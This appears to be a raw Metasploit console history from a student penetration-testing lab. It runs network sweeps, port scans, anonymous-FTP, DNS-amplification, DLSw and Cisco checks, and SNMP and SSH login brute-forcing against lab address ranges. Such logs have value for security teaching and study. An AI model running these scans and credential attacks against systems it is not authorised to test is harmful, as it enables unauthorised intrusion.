pwd
cd ..
ls
cd metasploit/
set RHOSTS 100.64.0.1-5
ser RPORT 23
set RPORT 23
setg SHOST 192.168.3.2
search auxiliary
search auxiliary | wc -l
search auxiliary | wc
search scanner
use arp_sweep
info
use
exploit
ls
set RHOST 192.168.3.1
use
exploit
use dslw
use dlsw_leak
info
exploit
use dns_amp
info
set DOMAINNAME tfg.uoc
exploit
use anonymous
use /ftp/anonymous
info
exploit
set RHOST 192.168.3.1
exploit
use cisco_asa
use rips
use rips_traversal
infop
info
use cisco_Ike
info
setg RHOST 192.168.3.1
exploit
set RHOSTS 100.64.0.129
exploit
use ack
use portscan/ack
info
setg RHOSTS 100.64.0.129
info
exploit
info
set PORTS 1-30
exploit
use portscan/tcp
info
set PORTS 1-50
exploit
set PORTS 1-100
exploit
use /portscan/tcp
set PORTS
exploit
set RHOSTS 100.64.0.0/24
set PORTS 1-100
exploit
spool metasploit
spool results.txt
use /snmp/snmp_login
info
set RHOSTS 100.64.0.0/24
set RPORT 162
use /snmp/snmp_login
set RHOSTS 100.64.0.0/24
set RPORT 162
exploit
set RHOSTS 192.168.3.1
exploit -j
ls
cat results.txt
use ssh/ssh_log
use ssh/ssh_login
use 0
set RHOSTS 100.64.0.129
set RPORT 22
info
use /ssh/ssh_login
use 0
set RHOSTS 100.64.0.129
set RPORT 21
exploit
info
exploit
back
db_status
workspace
systemctl start postgresql
msfdb init
db_status
workspace
workspace -a tfgMSF
workspace
workspace tfgMSF
db help
db_nmap -h
db help
db -h
db_status -h
workspace -h
workspace
workspace tfgMSF
workspace -h
workspace -l
workspace tfgMSF -l
-h
help
listm
use tftp
search cisco_enable
search cisco
search cisco_snmp
search cisco_config
use 1
pushm
listm
use scanner/snmp
use 11
pushm
use 12
pushm
listm
popm
clearm
listm
use scanner/snmp
use 11
info
set RHOSTS 100.64.0.129
set RPORT 162
set COMMUNITY none
pushm
use 10
info
set BLANK_PASSWORDS true
set DB_ALL_CREDS = true
set DB_ALL_USERS true
set RHOSTS 100.64.0.1
set USER_AS_PASS true
use 6
info
set OUTPUTDIR /pentest/snmp/host
listm
clearm
use scanner/snmp
use 11
set RHOSTS 100.64.0.129
set RPORT 162
set COMMUNITY none
pushm
use 10
set DB_ALL_USERS true
set RHOSTS 100.64.0.1
set RPORT 162
set USER_AS_PASS true
pushm
use 6
set RHOSTS 100.64.0.129
set RPORT 23
set COMMUNITY none
set OUTPUTDIR /pentest/snmp/host
pushm
listm
clearm
makerc
ls
pwd
